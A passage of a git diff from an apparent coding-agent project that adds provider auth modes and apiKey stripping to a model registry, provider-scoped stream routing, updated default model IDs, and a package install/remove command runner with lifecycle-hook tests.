+ const model = registry.getAll().find((m) => m.provider === "cli")!; + assert.equal(await registry.getApiKey(model), undefined); + }); + + it("returns undefined for none provider", async () => { + const registry = createRegistry(); + registry.registerProvider("local", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("m")], + }); + const model = registry.getAll().find((m) => m.provider === "local")!; + assert.equal(await registry.getApiKey(model), undefined); + }); + + it("delegates to authStorage for apiKey provider", async () => { + const registry = createRegistry(); + const key = await registry.getApiKeyForProvider("anthropic"); + assert.equal(key, undefined); + }); +}); + +// ─── streamSimple apiKey stripping ──────────────────────────────────────────── + +describe("ModelRegistry authMode — streamSimple apiKey boundary", () => { + it("strips apiKey from options for externalCli provider", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + const apiType = `ext-cli-strip-${Date.now()}`; + + registry.registerProvider("cli-strip", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: apiType as Api, + streamSimple: spy.streamSimple, + models: [createProviderModel("m", apiType)], + }); + + const provider = getApiProvider(apiType as Api); + assert.ok(provider, "provider must be registered in api registry"); + + provider.streamSimple( + makeModel("cli-strip", "m", apiType), + makeContext(), + { apiKey: "should-be-stripped", maxTokens: 1024 } as SimpleStreamOptions, + ); + + const captured = spy.getCapturedOptions(); + assert.ok(captured, "streamSimple must have been called"); + assert.equal("apiKey" in captured, false, "apiKey must not exist in options for externalCli provider"); + assert.equal(captured.maxTokens, 1024, "other options must pass through"); + }); + + it("strips apiKey from options for none provider", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + const apiType = `none-strip-${Date.now()}`; + + registry.registerProvider("none-strip", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: apiType as Api, + streamSimple: spy.streamSimple, + models: [createProviderModel("m", apiType)], + }); + + const provider = getApiProvider(apiType as Api); + assert.ok(provider, "provider must be registered in api registry"); + + provider.streamSimple( + makeModel("none-strip", "m", apiType), + makeContext(), + { apiKey: "should-be-stripped", maxTokens: 2048 } as SimpleStreamOptions, + ); + + const captured = spy.getCapturedOptions(); + assert.ok(captured, "streamSimple must have been called"); + assert.equal("apiKey" in captured, false, "apiKey must not exist in options for none provider"); + assert.equal(captured.maxTokens, 2048, "other options must pass through"); + }); + + it("preserves apiKey in options for apiKey provider", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + const apiType = `apikey-preserve-${Date.now()}`; + + registry.registerProvider("apikey-preserve", { + apiKey: "MY_KEY", + baseUrl: "https://api.local", + api: apiType as Api, + streamSimple: spy.streamSimple, + models: [createProviderModel("m", apiType)], + }); + + const provider = getApiProvider(apiType as Api); + assert.ok(provider, "provider must be registered in api registry"); + + provider.streamSimple( + makeModel("apikey-preserve", "m", apiType), + makeContext(), + { apiKey: "sk-real-key", maxTokens: 4096 } as SimpleStreamOptions, + ); + + const captured = spy.getCapturedOptions(); + assert.ok(captured, "streamSimple must have been called"); + assert.equal(captured.apiKey, "sk-real-key", "apiKey must be preserved for apiKey provider"); + assert.equal(captured.maxTokens, 4096, "other options must pass through"); + }); + + it("handles undefined options for externalCli provider", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + const apiType = `ext-cli-undef-${Date.now()}`; + + registry.registerProvider("cli-undef", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: apiType as Api, + streamSimple: spy.streamSimple, + models: [createProviderModel("m", apiType)], + }); + + const provider = getApiProvider(apiType as Api); + assert.ok(provider, "provider must be registered in api registry"); + + provider.streamSimple( + makeModel("cli-undef", "m", apiType), + makeContext(), + undefined, + ); + + const captured = spy.getCapturedOptions(); + assert.ok(captured !== undefined, "streamSimple must have been called"); + assert.equal("apiKey" in captured, false, "apiKey must not exist even when options is undefined"); + }); + + it("strips apiKey but preserves signal and other fields for externalCli", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + const apiType = `ext-cli-fields-${Date.now()}`; + const abortController = new AbortController(); + + registry.registerProvider("cli-fields", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: apiType as Api, + streamSimple: spy.streamSimple, + models: [createProviderModel("m", apiType)], + }); + + const provider = getApiProvider(apiType as Api); + assert.ok(provider, "provider must be registered in api registry"); + + provider.streamSimple( + makeModel("cli-fields", "m", apiType), + makeContext(), + { apiKey: "strip-me", maxTokens: 8192, signal: abortController.signal, reasoning: "high" } as SimpleStreamOptions, + ); + + const captured = spy.getCapturedOptions(); + assert.ok(captured, "streamSimple must have been called"); + assert.equal("apiKey" in captured, false, "apiKey must be stripped"); + assert.equal(captured.maxTokens, 8192, "maxTokens must pass through"); + assert.equal(captured.signal, abortController.signal, "signal must pass through"); + assert.equal((captured as Record).reasoning, "high", "reasoning must pass through"); + }); +}); + +// ─── Provider-scoped stream routing (#2533) ─────────────────────────────────── + +describe("ModelRegistry authMode — provider-scoped stream routing", () => { + it("does not clobber built-in stream handler when custom provider uses same api", () => { + const registry = createRegistry(() => true); + const customSpy = createStreamSpy(); + + // Register a custom provider with the same API type as a built-in (anthropic-messages). + // This simulates the claude-code-cli extension registering with api: "anthropic-messages". + registry.registerProvider("custom-cli", { + authMode: "externalCli", + baseUrl: "local://custom", + api: "anthropic-messages", + streamSimple: customSpy.streamSimple, + models: [createProviderModel("custom-model", "anthropic-messages")], + }); + + // The built-in anthropic-messages provider should still be accessible + // when calling streamSimple with a model from the built-in provider. + const provider = getApiProvider("anthropic-messages" as Api); + assert.ok(provider, "anthropic-messages provider must still be registered"); + + // Call with a built-in anthropic model — should NOT hit the custom spy. + // The built-in handler will throw (no API key), which proves the routing + // correctly delegates to the built-in instead of the custom handler. + assert.throws( + () => provider.streamSimple( + makeModel("anthropic", "claude-sonnet-4-6", "anthropic-messages"), + makeContext(), + { maxTokens: 4096 } as SimpleStreamOptions, + ), + (err: Error) => err.message.includes("API key"), + "built-in Anthropic handler must be invoked (throws because no API key in tests)", + ); + + assert.equal( + customSpy.getCapturedOptions(), + undefined, + "custom provider's streamSimple must NOT be called for anthropic provider models", + ); + }); + + it("routes to custom provider when model.provider matches", () => { + const registry = createRegistry(() => true); + const customSpy = createStreamSpy(); + + registry.registerProvider("custom-cli", { + authMode: "externalCli", + baseUrl: "local://custom", + api: "anthropic-messages", + streamSimple: customSpy.streamSimple, + models: [createProviderModel("custom-model", "anthropic-messages")], + }); + + const provider = getApiProvider("anthropic-messages" as Api); + assert.ok(provider); + + // Call with the custom provider's model — should hit the custom spy + provider.streamSimple( + makeModel("custom-cli", "custom-model", "anthropic-messages"), + makeContext(), + { maxTokens: 2048 } as SimpleStreamOptions, + ); + + const captured = customSpy.getCapturedOptions(); + assert.ok(captured, "custom provider's streamSimple must be called for its own models"); + assert.equal(captured.maxTokens, 2048); + }); +}); diff --git a/packages/pi-coding-agent/src/core/model-registry.ts b/packages/pi-coding-agent/src/core/model-registry.ts index 08766af24..762e459cc 100644 --- a/packages/pi-coding-agent/src/core/model-registry.ts +++ b/packages/pi-coding-agent/src/core/model-registry.ts @@ -4,8 +4,10 @@ import { type Api, + applyCapabilityPatches, type AssistantMessageEventStream, type Context, + getApiProvider, getModels, getProviders, type KnownProvider, @@ -28,6 +30,7 @@ import { ModelDiscoveryCache } from "./discovery-cache.js"; import type { DiscoveredModel, DiscoveryResult } from "./model-discovery.js"; import { getDefaultTTL, getDiscoverableProviders, getDiscoveryAdapter } from "./model-discovery.js"; import { clearConfigValueCache, resolveConfigValue, resolveHeaders } from "./resolve-config-value.js"; +import { isLocalModel } from "./local-model-check.js"; const Ajv = (AjvModule as any).default || AjvModule; const ajv = new Ajv(); @@ -128,6 +131,8 @@ ajv.addSchema(ModelsConfigSchema, "ModelsConfig"); type ModelsConfig = Static; +export type ProviderAuthMode = "apiKey" | "oauth" | "externalCli" | "none"; + /** Provider override config (baseUrl, headers, apiKey) without custom models */ interface ProviderOverride { baseUrl?: string; @@ -230,7 +235,7 @@ export class ModelRegistry { constructor( readonly authStorage: AuthStorage, - private modelsJsonPath: string | undefined = join(getAgentDir(), "models.json"), + readonly modelsJsonPath: string | undefined = join(getAgentDir(), "models.json"), ) { this.discoveryCache = new ModelDiscoveryCache(); @@ -243,6 +248,9 @@ export class ModelRegistry { return undefined; }); + // Refresh models when credentials change (e.g., OAuth token refresh with new model limits) + this.authStorage.onCredentialChange(() => this.refresh()); + // Load models this.loadModels(); } @@ -297,7 +305,10 @@ export class ModelRegistry { } } - this.models = combined; + // Apply capability patches so custom/discovered/extension models get + // capabilities (supportsXhigh, supportsServiceTier, etc.) that the + // static pi-ai registry applies at module load for built-in models. + this.models = applyCapabilityPatches(combined); } /** Load built-in models and apply provider/model overrides */ @@ -456,6 +467,18 @@ export class ModelRegistry { this.customProviderApiKeys.set(providerName, providerConfig.apiKey); } + // Register custom providers so isProviderRequestReady() can find + // them (#3531). Without this, models.json providers with apiKey + // fail the auth check and are invisible to the fallback resolver. + if (!this.registeredProviders.has(providerName)) { + this.registeredProviders.set(providerName, { + authMode: providerConfig.apiKey ? "apiKey" : "none", + apiKey: providerConfig.apiKey, + baseUrl: providerConfig.baseUrl, + isReady: providerConfig.apiKey ? () => true : undefined, + } as any); + } + for (const modelDef of modelDefs) { const api = modelDef.api || providerConfig.api; if (!api) continue; @@ -510,7 +533,31 @@ export class ModelRegistry { * This is a fast check that doesn't refresh OAuth tokens. */ getAvailable(): Model[] { - return this.models.filter((m) => this.authStorage.hasAuth(m.provider)); + return this.models.filter((m) => this.isProviderRequestReady(m.provider)); + } + + /** + * Get auth mode for a provider. + * Defaults to "apiKey" for built-ins and providers without explicit mode. + */ + getProviderAuthMode(provider: string): ProviderAuthMode { + const config = this.registeredProviders.get(provider); + if (!config) return "apiKey"; + if (config.authMode) return config.authMode; + if (config.oauth) return "oauth"; + if (config.apiKey) return "apiKey"; + return "apiKey"; + } + + /** + * Whether a provider can be used for requests/fallback without hard auth gating. + */ + isProviderRequestReady(provider: string): boolean { + const config = this.registeredProviders.get(provider); + if (config?.isReady) return config.isReady(); + const authMode = this.getProviderAuthMode(provider); + if (authMode === "externalCli" || authMode === "none") return true; + return this.authStorage.hasAuth(provider); } /** @@ -522,17 +569,23 @@ export class ModelRegistry { /** * Get API key for a model. + * Returns undefined for externalCli/none providers (no key needed). * @param sessionId - Optional session ID for sticky credential selection */ async getApiKey(model: Model, sessionId?: string): Promise { - return this.authStorage.getApiKey(model.provider, sessionId); + const authMode = this.getProviderAuthMode(model.provider); + if (authMode === "externalCli" || authMode === "none") return undefined; + return this.authStorage.getApiKey(model.provider, sessionId, { baseUrl: model.baseUrl }); } /** * Get API key for a provider. + * Returns undefined for externalCli/none providers (no key needed). * @param sessionId - Optional session ID for sticky credential selection */ async getApiKeyForProvider(provider: string, sessionId?: string): Promise { + const authMode = this.getProviderAuthMode(provider); + if (authMode === "externalCli" || authMode === "none") return undefined; return this.authStorage.getApiKey(provider, sessionId); } @@ -587,12 +640,49 @@ export class ModelRegistry { if (!config.api) { throw new Error(`Provider ${providerName}: "api" is required when registering streamSimple.`); } - const streamSimple = config.streamSimple; + const rawStreamSimple = config.streamSimple; + const authMode = config.authMode ?? "apiKey"; + + // Keyless providers never see apiKey in options — enforced at registration, + // not by convention. Prevents undefined from reaching any handler. + const streamSimple = (authMode === "externalCli" || authMode === "none") + ? ((model: Model, context: Context, options?: SimpleStreamOptions) => { + const { apiKey: _, ...opts } = options ?? {}; + return rawStreamSimple(model, context, opts as SimpleStreamOptions); + }) + : rawStreamSimple; + + // Guard: if there's already a handler registered for this API, wrap + // the new one so it only fires for models from this provider and + // delegates to the previous handler for all other providers. Without + // this, a custom provider using api:"anthropic-messages" would clobber + // the built-in Anthropic stream handler (#2536). + const existingProvider = getApiProvider(config.api as Api); + const scopedStream = existingProvider + ? (model: Model, context: Context, options?: SimpleStreamOptions): AssistantMessageEventStream => { + if (model.provider === providerName) { + return streamSimple(model, context, options); + } + return existingProvider.streamSimple(model, context, options); + } + : streamSimple; + + const newFullStream = (model: Model, context: Context, options?: SimpleStreamOptions) => + scopedStream(model, context, options as SimpleStreamOptions); + const scopedFullStream = existingProvider + ? (model: Model, context: Context, options?: Record) => { + if (model.provider === providerName) { + return newFullStream(model, context, options as SimpleStreamOptions); + } + return existingProvider.stream(model, context, options); + } + : newFullStream; + registerApiProvider( { api: config.api, - stream: (model, context, options) => streamSimple(model, context, options as SimpleStreamOptions), - streamSimple, + stream: scopedFullStream as any, + streamSimple: scopedStream, }, `provider:${providerName}`, ); @@ -611,8 +701,24 @@ export class ModelRegistry { if (!config.baseUrl) { throw new Error(`Provider ${providerName}: "baseUrl" is required when defining models.`); } - if (!config.apiKey && !config.oauth) { - throw new Error(`Provider ${providerName}: "apiKey" or "oauth" is required when defining models.`); + const authMode = config.authMode ?? (config.oauth ? "oauth" : config.apiKey ? "apiKey" : "apiKey"); + if (authMode === "apiKey" && !config.apiKey && !config.oauth) { + throw new Error( + `Provider ${providerName}: "apiKey" or "oauth" is required when authMode is "apiKey" (the default). ` + + `Set authMode to "externalCli" or "none" for keyless providers.`, + ); + } + if ((authMode === "externalCli" || authMode === "none") && !config.streamSimple) { + throw new Error( + `Provider ${providerName}: "streamSimple" is required when authMode is "${authMode}". ` + + `Keyless providers must supply their own stream handler.`, + ); + } + if ((authMode === "externalCli" || authMode === "none") && config.apiKey) { + throw new Error( + `Provider ${providerName}: "apiKey" cannot be set when authMode is "${authMode}". ` + + `Keyless providers should not provide API key credentials.`, + ); } // Parse and add new models @@ -648,6 +754,7 @@ export class ModelRegistry { maxTokens: modelDef.maxTokens, headers, compat: modelDef.compat, + providerOptions: modelDef.providerOptions, } as Model); } @@ -658,6 +765,9 @@ export class ModelRegistry { this.models = config.oauth.modifyModels(this.models, cred); } } + + // Ensure newly added extension models get capability patches + this.models = applyCapabilityPatches(this.models); } else if (config.baseUrl) { // Override-only: update baseUrl/headers for existing models const resolvedHeaders = resolveHeaders(config.headers); @@ -699,7 +809,7 @@ export class ModelRegistry { try { const apiKey = await this.authStorage.getApiKey(providerName); - if (!apiKey && providerName !== "ollama") continue; + if (!apiKey && !this.isProviderRequestReady(providerName)) continue; const models = await adapter.fetchModels(apiKey ?? "", undefined); this.discoveryCache.set(providerName, models); @@ -718,8 +828,8 @@ export class ModelRegistry { } } - // Convert and merge discovered models - this.discoveredModels = this.convertDiscoveredModels(results); + // Convert and merge discovered models, then apply capability patches + this.discoveredModels = applyCapabilityPatches(this.convertDiscoveredModels(results)); return results; } @@ -771,12 +881,35 @@ export class ModelRegistry { } return converted; } + + /** + * Check if a model's baseUrl points to a local endpoint. + * Delegates to standalone isLocalModel() function. + */ + static isLocalModel(model: Model): boolean { + return isLocalModel(model); + } + + /** + * Check if all models in the registry are local. + * Returns true only if every model passes isLocalModel(). + * Returns false if there are no models. + */ + isAllLocalChain(): boolean { + const models = this.getAll(); + if (models.length === 0) return false; + return models.every((m) => isLocalModel(m)); + } } /** * Input type for registerProvider API. */ export interface ProviderConfigInput { + authMode?: ProviderAuthMode; + /** Optional readiness check. Called by isProviderRequestReady() before default auth checks. + * Trusted at the same level as extension code — extensions already have arbitrary code execution. */ + isReady?: () => boolean; baseUrl?: string; apiKey?: string; api?: Api; @@ -797,5 +930,6 @@ export interface ProviderConfigInput { maxTokens: number; headers?: Record; compat?: Model["compat"]; + providerOptions?: Record; }>; } diff --git a/packages/pi-coding-agent/src/core/model-resolver.ts b/packages/pi-coding-agent/src/core/model-resolver.ts index bfe6ee86f..3e3b266f7 100644 --- a/packages/pi-coding-agent/src/core/model-resolver.ts +++ b/packages/pi-coding-agent/src/core/model-resolver.ts @@ -13,7 +13,7 @@ import type { ModelRegistry } from "./model-registry.js"; /** Default model IDs for each known provider */ const defaultModelPerProvider: Record = { "amazon-bedrock": "us.anthropic.claude-opus-4-6-v1", - anthropic: "claude-opus-4-6[1m]", + anthropic: "claude-opus-4-6", "anthropic-vertex": "claude-sonnet-4-6", openai: "gpt-5.4", "azure-openai-responses": "gpt-5.2", @@ -24,7 +24,7 @@ const defaultModelPerProvider: Record = { "google-vertex": "gemini-3-pro-preview", "github-copilot": "gpt-4o", openrouter: "openai/gpt-5.1-codex", - "vercel-ai-gateway": "anthropic/claude-opus-4-6[1m]", + "vercel-ai-gateway": "anthropic/claude-opus-4-6", xai: "grok-4-fast-non-reasoning", groq: "openai/gpt-oss-120b", cerebras: "zai-glm-4.6", @@ -37,6 +37,7 @@ const defaultModelPerProvider: Record = { "opencode-go": "kimi-k2.5", "kimi-coding": "kimi-k2-thinking", "alibaba-coding-plan": "qwen3.5-plus", + ollama: "llama3.1:8b", "ollama-cloud": "qwen3:32b", }; @@ -506,7 +507,7 @@ export async function findInitialModel(options: { const found = modelRegistry.find(defaultProvider, defaultModelId); if (found) { // Check if the provider's recommended default is a higher-capability variant - // of the saved model (e.g. saved "claude-opus-4-6" vs recommended "claude-opus-4-6[1m]"). + // of the saved model (e.g. saved "claude-opus-4-6" vs recommended "claude-opus-4-6-extended"). // If so, prefer the recommended variant to avoid using a smaller context window (#1125). const recommendedId = defaultModelPerProvider[defaultProvider as KnownProvider]; if (recommendedId && recommendedId !== defaultModelId && recommendedId.startsWith(defaultModelId)) { diff --git a/packages/pi-coding-agent/src/core/package-commands.test.ts b/packages/pi-coding-agent/src/core/package-commands.test.ts new file mode 100644 index 000000000..4b691a812 --- /dev/null +++ b/packages/pi-coding-agent/src/core/package-commands.test.ts @@ -0,0 +1,262 @@ +import assert from "node:assert/strict"; +import { existsSync, mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync } from "node:fs"; +import { tmpdir } from "node:os"; +import { join } from "node:path"; +import { Writable } from "node:stream"; +import { describe, it } from "node:test"; +import { runPackageCommand } from "./package-commands.js"; + +function createCaptureStream() { + let output = ""; + const stream = new Writable({ + write(chunk, _encoding, callback) { + output += chunk.toString(); + callback(); + }, + }) as unknown as NodeJS.WriteStream; + return { stream, getOutput: () => output }; +} + +function writePackage(root: string, files: Record): void { + for (const [relPath, content] of Object.entries(files)) { + const abs = join(root, relPath); + mkdirSync(join(abs, ".."), { recursive: true }); + writeFileSync(abs, content, "utf-8"); + } +} + +function createTestDirs(prefix: string, t: { after: (fn: () => void) => void }) { + const root = mkdtempSync(join(tmpdir(), `pi-lifecycle-${prefix}-`)); + t.after(() => rmSync(root, { recursive: true, force: true })); + const cwd = join(root, "cwd"); + const agentDir = join(root, "agent"); + const extensionDir = join(root, `ext-${prefix}`); + mkdirSync(cwd, { recursive: true }); + mkdirSync(agentDir, { recursive: true }); + mkdirSync(extensionDir, { recursive: true }); + return { root, cwd, agentDir, extensionDir }; +} + +describe("runPackageCommand lifecycle hooks", () => { + it("executes registered beforeInstall and afterInstall handlers for local packages", async (t) => { + const { cwd, agentDir, extensionDir } = createTestDirs("install", t); + + writePackage(extensionDir, { + "package.json": JSON.stringify({ + name: "ext-registered", + type: "module", + pi: { extensions: ["./index.js"] }, + }), + "index.js": [ + 'import { writeFileSync } from "node:fs";', + 'import { join } from "node:path";', + "export default function (pi) {", + " pi.registerBeforeInstall((ctx) => {", + ' writeFileSync(join(ctx.installedPath, "before-install-ran.txt"), "ok", "utf-8");', + " });", + " pi.registerAfterInstall((ctx) => {", + ' writeFileSync(join(ctx.installedPath, "after-install-ran.txt"), "ok", "utf-8");', + " });", + "}", + ].join("\n"), + }); + + const stdout = createCaptureStream(); + const stderr = createCaptureStream(); + const result = await runPackageCommand({ + appName: "pi", + args: ["install", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + + assert.equal(result.handled, true); + assert.equal(result.exitCode, 0); + assert.equal(readFileSync(join(extensionDir, "before-install-ran.txt"), "utf-8"), "ok"); + assert.equal(readFileSync(join(extensionDir, "after-install-ran.txt"), "utf-8"), "ok"); + assert.ok(stdout.getOutput().includes(`Installed ${extensionDir}`)); + }); + + it("runs legacy named lifecycle hooks when no registered hooks exist", async (t) => { + const { cwd, agentDir, extensionDir } = createTestDirs("legacy", t); + + writePackage(extensionDir, { + "package.json": JSON.stringify({ + name: "ext-legacy", + type: "module", + pi: { extensions: ["./index.js"] }, + }), + "index.js": [ + 'import { writeFileSync } from "node:fs";', + 'import { join } from "node:path";', + "export default function () {}", + "export async function beforeInstall(ctx) {", + ' writeFileSync(join(ctx.installedPath, "legacy-before-install.txt"), "ok", "utf-8");', + "}", + "export async function afterInstall(ctx) {", + ' writeFileSync(join(ctx.installedPath, "legacy-after-install.txt"), "ok", "utf-8");', + "}", + "export async function beforeRemove(ctx) {", + ' writeFileSync(join(ctx.installedPath, "legacy-before-remove.txt"), "ok", "utf-8");', + "}", + "export async function afterRemove(ctx) {", + ' writeFileSync(join(ctx.installedPath, "legacy-after-remove.txt"), "ok", "utf-8");', + "}", + ].join("\n"), + }); + + const stdout = createCaptureStream(); + const stderr = createCaptureStream(); + const installResult = await runPackageCommand({ + appName: "pi", + args: ["install", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + + assert.equal(installResult.handled, true); + assert.equal(installResult.exitCode, 0); + assert.equal(readFileSync(join(extensionDir, "legacy-before-install.txt"), "utf-8"), "ok"); + assert.equal(readFileSync(join(extensionDir, "legacy-after-install.txt"), "utf-8"), "ok"); + + const removeResult = await runPackageCommand({ + appName: "pi", + args: ["remove", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + + assert.equal(removeResult.handled, true); + assert.equal(removeResult.exitCode, 0); + assert.equal(readFileSync(join(extensionDir, "legacy-before-remove.txt"), "utf-8"), "ok"); + assert.equal(readFileSync(join(extensionDir, "legacy-after-remove.txt"), "utf-8"), "ok"); + }); + + it("skips lifecycle phases with no hooks declared", async (t) => { + const { cwd, agentDir, extensionDir } = createTestDirs("skip", t); + + writePackage(extensionDir, { + "package.json": JSON.stringify({ + name: "ext-empty", + type: "module", + pi: { extensions: ["./index.js"] }, + }), + "index.js": "export default function () {}", + }); + + const stdout = createCaptureStream(); + const stderr = createCaptureStream(); + const installResult = await runPackageCommand({ + appName: "pi", + args: ["install", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + assert.equal(installResult.handled, true); + assert.equal(installResult.exitCode, 0); + + const removeResult = await runPackageCommand({ + appName: "pi", + args: ["remove", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + assert.equal(removeResult.handled, true); + assert.equal(removeResult.exitCode, 0); + assert.equal(stderr.getOutput().includes("Hook failed"), false); + }); + + it("fails install when manifest runtime dependency is missing", async (t) => { + const { cwd, agentDir, extensionDir } = createTestDirs("deps", t); + + writePackage(extensionDir, { + "package.json": JSON.stringify({ + name: "ext-runtime-deps", + type: "module", + pi: { extensions: ["./index.js"] }, + }), + "index.js": "export default function () {}", + "extension-manifest.json": JSON.stringify({ + id: "ext-runtime-deps", + name: "Runtime Dep Test", + version: "1.0.0", + dependencies: { runtime: ["__definitely_missing_command_for_test__"] }, + }), + }); + + const stdout = createCaptureStream(); + const stderr = createCaptureStream(); + const result = await runPackageCommand({ + appName: "pi", + args: ["install", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + + assert.equal(result.handled, true); + assert.equal(result.exitCode, 1); + assert.ok(stderr.getOutput().includes("Missing runtime dependencies")); + }); + + it("afterRemove hook receives installedPath even when directory is deleted", async (t) => { + const { cwd, agentDir, extensionDir } = createTestDirs("after-remove", t); + + writePackage(extensionDir, { + "package.json": JSON.stringify({ + name: "ext-after-remove", + type: "module", + pi: { extensions: ["./index.js"] }, + }), + "index.js": [ + 'import { writeFileSync, existsSync } from "node:fs";', + 'import { join } from "node:path";', + "export default function () {}", + "export async function afterRemove(ctx) {", + ' const marker = join(ctx.cwd, "after-remove-marker.json");', + " writeFileSync(marker, JSON.stringify({", + " receivedPath: ctx.installedPath,", + " pathExisted: existsSync(ctx.installedPath),", + ' }), "utf-8");', + "}", + ].join("\n"), + }); + + const stdout = createCaptureStream(); + const stderr = createCaptureStream(); + + await runPackageCommand({ + appName: "pi", + args: ["install", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + + await runPackageCommand({ + appName: "pi", + args: ["remove", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + + const markerPath = join(cwd, "after-remove-marker.json"); + assert.ok(existsSync(markerPath), "afterRemove hook must have executed and written marker"); + const marker = JSON.parse(readFileSync(markerPath, "utf-8")); + assert.equal(typeof marker.receivedPath, "string", "hook must receive installedPath as string"); + }); +}); diff --git a/packages/pi-coding-agent/src/core/package-commands.ts b/packages/pi-coding-agent/src/core/package-commands.ts new file mode 100644 index 000000000..273da7145 --- /dev/null +++ b/packages/pi-coding-agent/src/core/package-commands.ts @@ -0,0 +1,310 @@ +import chalk from "chalk"; +import { DefaultPackageManager } from "./package-manager.js"; +import { prepareLifecycleHooks, runLifecycleHooks } from "./lifecycle-hooks.js"; +import { SettingsManager } from "./settings-manager.js"; + +export type PackageCommand = "install" | "remove" | "update" | "list"; + +export interface PackageCommandOptions { + command: PackageCommand; + source?: string; + local: boolean; + help: boolean; + invalidOption?: string; +} + +export interface PackageCommandRunnerOptions { + appName: string; + args: string[]; + cwd: string; + agentDir: string; + stdout?: NodeJS.WriteStream; + stderr?: NodeJS.WriteStream; + allowedCommands?: ReadonlySet; +} + +export interface PackageCommandRunnerResult { + handled: boolean; + exitCode: number; +} + +function reportSettingsErrors(settingsManager: SettingsManager, context: string, stderr: NodeJS.WriteStream): void { + const errors = settingsManager.drainErrors(); + for (const { scope, error } of errors) { + stderr.write(chalk.yellow(`Warning (${context}, ${scope} settings): ${error.message}`) + "\n"); + if (error.stack) { + stderr.write(chalk.dim(error.stack) + "\n"); + } + } +} + +export function getPackageCommandUsage(appName: string, command: PackageCommand): string { + switch (command) { + case "install": + return `${appName} install [-l]`; + case "remove": + return `${appName} remove [-l]`; + case "update": + return `${appName} update [source]`; + case "list": + return `${appName} list`; + } +} + +function printPackageCommandHelp( + appName: string, + command: PackageCommand, + stdout: NodeJS.WriteStream, +): void { + switch (command) { + case "install": + stdout.write(`${chalk.bold("Usage:")} + ${getPackageCommandUsage(appName, "install")} + +Install a package, add it to settings, and run lifecycle hooks. + +Options: + -l, --local Install project-locally (.pi/settings.json) + +Examples: + ${appName} install npm:@foo/bar + ${appName} install git:github.com/user/repo + ${appName} install git:git@github.com:user/repo + ${appName} install https://github.com/user/repo + ${appName} install ssh://git@github.com/user/repo + ${appName} install ./local/path +`); + return; + case "remove": + stdout.write(`${chalk.bold("Usage:")} + ${getPackageCommandUsage(appName, "remove")} + +Remove a package and its source from settings. + +Options: + -l, --local Remove from project settings (.pi/settings.json) + +Example: + ${appName} remove npm:@foo/bar +`); + return; + case "update": + stdout.write(`${chalk.bold("Usage:")} + ${getPackageCommandUsage(appName, "update")} + +Update installed packages. +If is provided, only that package is updated. +`); + return; + case "list": + stdout.write(`${chalk.bold("Usage:")} + ${getPackageCommandUsage(appName, "list")} + +List installed packages from user and project settings. +`); + return; + } +} + +export function parsePackageCommand( + args: string[], + allowedCommands?: ReadonlySet, +): PackageCommandOptions | undefined { + const [command, ...rest] = args; + if (command !== "install" && command !== "remove" && command !== "update" && command !== "list") { + return undefined; + } + if (allowedCommands && !allowedCommands.has(command)) { + return undefined; + } + + let local = false; + let help = false; + let invalidOption: string | undefined; + let source: string | undefined; + + for (const arg of rest) { + if (arg === "-h" || arg === "--help") { + help = true; + continue; + } + if (arg === "-l" || arg === "--local") { + if (command === "install" || command === "remove") { + local = true; + } else { + invalidOption = invalidOption ?? arg; + } + continue; + } + if (arg.startsWith("-")) { + invalidOption = invalidOption ?? arg; + continue; + } + if (!source) { + source = arg; + } + } + + return { command, source, local, help, invalidOption }; +} + +export async function runPackageCommand( + options: PackageCommandRunnerOptions, +): Promise { + const stdout = options.stdout ?? process.stdout; + const stderr = options.stderr ?? process.stderr; + const parsed = parsePackageCommand(options.args, options.allowedCommands); + if (!parsed) { + return { handled: false, exitCode: 0 }; + } + + if (parsed.help) { + printPackageCommandHelp(options.appName, parsed.command, stdout); + return { handled: true, exitCode: 0 }; + } + + if (parsed.invalidOption) { + stderr.write(chalk.red(`Unknown option ${parsed.invalidOption} for "${parsed.command}".`) + "\n"); + stderr.write(chalk.dim(`Use "${options.appName} --help" or "${getPackageCommandUsage(options.appName, parsed.command)}".`) + "\n"); + return { handled: true, exitCode: 1 }; + } + + const source = parsed.source; + if ((parsed.command === "install" || parsed.command === "remove") && !source) { + stderr.write(chalk.red(`Missing ${parsed.command} source.`) + "\n"); + stderr.write(chalk.dim(`Usage: ${getPackageCommandUsage(options.appName, parsed.command)}`) + "\n"); + return { handled: true, exitCode: 1 }; + } + + const settingsManager = SettingsManager.create(options.cwd, options.agentDir); + reportSettingsErrors(settingsManager, "package command", stderr); + const packageManager = new DefaultPackageManager({ + cwd: options.cwd, + agentDir: options.agentDir, + settingsManager, + }); + packageManager.setProgressCallback((event) => { + if (event.type === "start" && event.message) { + stdout.write(chalk.dim(`${event.message}\n`)); + } + }); + + try { + switch (parsed.command) { + case "install": { + const lifecycleOptions = { + source: source!, + local: parsed.local, + cwd: options.cwd, + agentDir: options.agentDir, + appName: options.appName, + packageManager, + stdout, + stderr, + }; + + const beforeInstallHooks = await prepareLifecycleHooks(lifecycleOptions, "source"); + const beforeInstallResult = await runLifecycleHooks(beforeInstallHooks, "beforeInstall"); + + await packageManager.install(source!, { local: parsed.local }); + packageManager.addSourceToSettings(source!, { local: parsed.local }); + + const afterInstallHooks = await prepareLifecycleHooks(lifecycleOptions, "installed", { + verifyRuntimeDependencies: true, + }); + const afterInstallResult = await runLifecycleHooks(afterInstallHooks, "afterInstall"); + + const hookErrors = beforeInstallResult.hookErrors 